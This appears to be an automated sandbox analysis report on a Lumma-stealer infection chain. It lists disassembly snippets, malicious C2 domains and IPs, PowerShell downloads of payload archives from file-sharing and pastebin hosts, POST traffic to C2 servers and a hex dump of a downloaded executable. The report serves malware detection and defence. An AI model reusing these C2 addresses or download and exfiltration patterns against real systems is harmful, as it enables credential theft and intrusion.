Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000000.2626820511.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000013.00000002.4106639355.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000014.00000002.3064617756.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000014.00000000.2627426001.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 0000001A.00000000.2764355472.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 0000001A.00000002.3104887965.0000000000402000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Core.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Code function: 20_2_6C87FBAE FindFirstFileExW,

20_2_6C87FBAE

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	16_2_03053260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+50h]	16_2_030691C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+1Ch]	16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_03062E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	16_2_03087E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+70h]	16_2_03067DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	16_2_03067DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	16_2_03089C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	16_2_0308A479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+30h]	16_2_0305FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+00000200h]	16_2_0305FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	16_2_03066CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push eax	16_2_03083CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_0306B360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	16_2_030733B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esi+08h]	16_2_030643E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h	16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [03094A9Ch]	16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	16_2_03081BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea ebp, dword ptr [esp+03h]	16_2_03076210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], 0000h	16_2_03063A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	16_2_03053A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	16_2_030682CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	16_2_0306B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_0306B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	16_2_03061937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ebx+eax*4]	16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	16_2_0307617A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [03094970h]	16_2_030741A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_0305A000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	16_2_0306D810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ecx], ax	16_2_03065871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h	16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_03088880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	16_2_030538D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	16_2_030630F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	16_2_030630F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov al, 01h	16_2_0308A706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	16_2_03086710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	16_2_030737B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	16_2_03063678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc ebx	16_2_030666B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	16_2_03066EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	16_2_03061D52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	16_2_03052DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	16_2_03063DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	16_2_030765F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	16_2_0306EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	16_2_0305E450

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.172.114.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.145.236.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.144.253.197 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor	URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor	URLs: http://olinsw.ws/tmp/index.php

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Source: unknown

Network traffic detected: IP country count 10

Source: global traffic	TCP traffic: 192.168.2.4:62293 -> 193.222.96.24:4449
Source: global traffic	TCP traffic: 192.168.2.4:62319 -> 94.156.79.190:4449

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 05:43:56 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 77.221.157.163 77.221.157.163
Source: Joe Sandbox View	IP Address: 107.173.160.139 107.173.160.139
Source: Joe Sandbox View	IP Address: 107.173.160.137 107.173.160.137

Source: Joe Sandbox View	ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9147
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 166871
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1263
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1281Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
